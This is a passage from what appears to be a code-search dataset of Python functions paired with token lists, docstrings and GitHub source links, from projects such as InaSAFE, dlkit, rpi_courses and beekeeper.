        if not settings.REGISTRY_SKIP_CELERY:
            index_layer(layer.id, use_cache=True)
        else:
            index_layer(layer.id)
[ "def", "index_service", "(", "self", ",", "service_id", ")", ":", "from", "hypermap", ".", "aggregator", ".", "models", "import", "Service", "service", "=", "Service", ".", "objects", ".", "get", "(", "id", "=", "service_id", ")", "if", "not", "service", ".", "is_valid", ":", "LOGGER", ".", "debug", "(", "'Not indexing service with id %s in search engine as it is not valid'", "%", "service", ".", "id", ")", "return", "LOGGER", ".", "debug", "(", "'Indexing service %s'", "%", "service", ".", "id", ")", "layer_to_process", "=", "service", ".", "layer_set", ".", "all", "(", ")", "for", "layer", "in", "layer_to_process", ":", "if", "not", "settings", ".", "REGISTRY_SKIP_CELERY", ":", "index_layer", "(", "layer", ".", "id", ",", "use_cache", "=", "True", ")", "else", ":", "index_layer", "(", "layer", ".", "id", ")" ]
Index a service in search engine.
[ "Index", "a", "service", "in", "search", "engine", "." ]
python
train
inasafe/inasafe
safe/plugin.py
https://github.com/inasafe/inasafe/blob/831d60abba919f6d481dc94a8d988cc205130724/safe/plugin.py#L464-L477
def _create_analysis_extent_action(self):
    """Create action for analysis extent dialog."""
    icon = resources_path('img', 'icons', 'set-extents-tool.svg')
    self.action_extent_selector = QAction(
        QIcon(icon),
        self.tr('Set Analysis Area'),
        self.iface.mainWindow())
    self.action_extent_selector.setStatusTip(self.tr(
        'Set the analysis area for InaSAFE'))
    self.action_extent_selector.setWhatsThis(self.tr(
        'Set the analysis area for InaSAFE'))
    self.action_extent_selector.triggered.connect(
        self.show_extent_selector)
    self.add_action(self.action_extent_selector)
[ "def", "_create_analysis_extent_action", "(", "self", ")", ":", "icon", "=", "resources_path", "(", "'img'", ",", "'icons'", ",", "'set-extents-tool.svg'", ")", "self", ".", "action_extent_selector", "=", "QAction", "(", "QIcon", "(", "icon", ")", ",", "self", ".", "tr", "(", "'Set Analysis Area'", ")", ",", "self", ".", "iface", ".", "mainWindow", "(", ")", ")", "self", ".", "action_extent_selector", ".", "setStatusTip", "(", "self", ".", "tr", "(", "'Set the analysis area for InaSAFE'", ")", ")", "self", ".", "action_extent_selector", ".", "setWhatsThis", "(", "self", ".", "tr", "(", "'Set the analysis area for InaSAFE'", ")", ")", "self", ".", "action_extent_selector", ".", "triggered", ".", "connect", "(", "self", ".", "show_extent_selector", ")", "self", ".", "add_action", "(", "self", ".", "action_extent_selector", ")" ]
Create action for analysis extent dialog.
[ "Create", "action", "for", "analysis", "extent", "dialog", "." ]
python
train
mitsei/dlkit
dlkit/services/logging_.py
https://github.com/mitsei/dlkit/blob/445f968a175d61c8d92c0f617a3c17dc1dc7c584/dlkit/services/logging_.py#L1080-L1088
def use_comparative_log_entry_view(self):
    """Pass through to provider LogEntryLookupSession.use_comparative_log_entry_view"""
    self._object_views['log_entry'] = COMPARATIVE
    # self._get_provider_session('log_entry_lookup_session')  # To make sure the session is tracked
    for session in self._get_provider_sessions():
        try:
            session.use_comparative_log_entry_view()
        except AttributeError:
            pass
[ "def", "use_comparative_log_entry_view", "(", "self", ")", ":", "self", ".", "_object_views", "[", "'log_entry'", "]", "=", "COMPARATIVE", "# self._get_provider_session('log_entry_lookup_session') # To make sure the session is tracked", "for", "session", "in", "self", ".", "_get_provider_sessions", "(", ")", ":", "try", ":", "session", ".", "use_comparative_log_entry_view", "(", ")", "except", "AttributeError", ":", "pass" ]
Pass through to provider LogEntryLookupSession.use_comparative_log_entry_view
[ "Pass", "through", "to", "provider", "LogEntryLookupSession", ".", "use_comparative_log_entry_view" ]
python
train
jeffh/rpi_courses
rpi_courses/web.py
https://github.com/jeffh/rpi_courses/blob/c97176f73f866f112c785910ebf3ff8a790e8e9a/rpi_courses/web.py#L61-L74
def list_rocs_files(url=ROCS_URL):
    """Lists the files linked from the given url.
    """
    soup = BeautifulSoup(get(url))
    if not url.endswith('/'):
        url += '/'
    files = []
    for elem in soup.findAll('a'):
        if elem['href'].startswith('?'):
            continue
        if elem.string.lower() == 'parent directory':
            continue
        files.append(url + elem['href'])
    return files
[ "def", "list_rocs_files", "(", "url", "=", "ROCS_URL", ")", ":", "soup", "=", "BeautifulSoup", "(", "get", "(", "url", ")", ")", "if", "not", "url", ".", "endswith", "(", "'/'", ")", ":", "url", "+=", "'/'", "files", "=", "[", "]", "for", "elem", "in", "soup", ".", "findAll", "(", "'a'", ")", ":", "if", "elem", "[", "'href'", "]", ".", "startswith", "(", "'?'", ")", ":", "continue", "if", "elem", ".", "string", ".", "lower", "(", ")", "==", "'parent directory'", ":", "continue", "files", ".", "append", "(", "url", "+", "elem", "[", "'href'", "]", ")", "return", "files" ]
Lists the files linked from the given url.
[ "Gets", "the", "contents", "of", "the", "given", "url", "." ]
python
train
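A self-contained check of the link-filtering logic above on an inline directory-index snippet; bs4 stands in for the BeautifulSoup 3 import that the findAll call suggests, and behaves the same for these calls.

from bs4 import BeautifulSoup

html = '''<a href="?C=N;O=D">Name</a>
<a href="/">Parent Directory</a>
<a href="fall2023.xml">fall2023.xml</a>'''
url = 'http://example.com/rocs/'

files = []
for elem in BeautifulSoup(html, 'html.parser').findAll('a'):
    if elem['href'].startswith('?'):
        continue
    if elem.string.lower() == 'parent directory':
        continue
    files.append(url + elem['href'])
print(files)  # ['http://example.com/rocs/fall2023.xml']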
haikuginger/beekeeper
beekeeper/variables.py
https://github.com/haikuginger/beekeeper/blob/b647d3add0b407ec5dc3a2a39c4f6dac31243b18/beekeeper/variables.py#L191-L196
def vals(self, var_type):
    """
    Create a dictionary with name/value pairs listing
    the variables of a particular type that have a value.
    """
    return {x: y for x, y in self.items() if y.has_value_of_type(var_type)}
[ "def", "vals", "(", "self", ",", "var_type", ")", ":", "return", "{", "x", ":", "y", "for", "x", ",", "y", "in", "self", ".", "items", "(", ")", "if", "y", ".", "has_value_of_type", "(", "var_type", ")", "}" ]
Create a dictionary with name/value pairs listing the variables of a particular type that have a value.
[ "Create", "a", "dictionary", "with", "name", "/", "value", "pairs", "listing", "the", "variables", "of", "a", "particular", "type", "that", "have", "a", "value", "." ]
python
train
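A self-contained sketch of the filter above; Variables is a dict-like container in beekeeper, so a plain dict of stub objects stands in, and has_value_of_type is assumed to mean "right type and a value is actually present".

class Var:
    def __init__(self, var_type, value=None):
        self.var_type = var_type
        self.value = value

    def has_value_of_type(self, var_type):
        # assumed semantics: matching type and a value actually set
        return self.var_type == var_type and self.value is not None

pool = {'token': Var('header', 'abc123'),
        'page': Var('url_param'),
        'q': Var('url_param', 'bees')}
# the real vals() returns the Var objects; .value is shown here for readability
print({x: y.value for x, y in pool.items() if y.has_value_of_type('url_param')})
# {'q': 'bees'} -- only url_param variables that carry a value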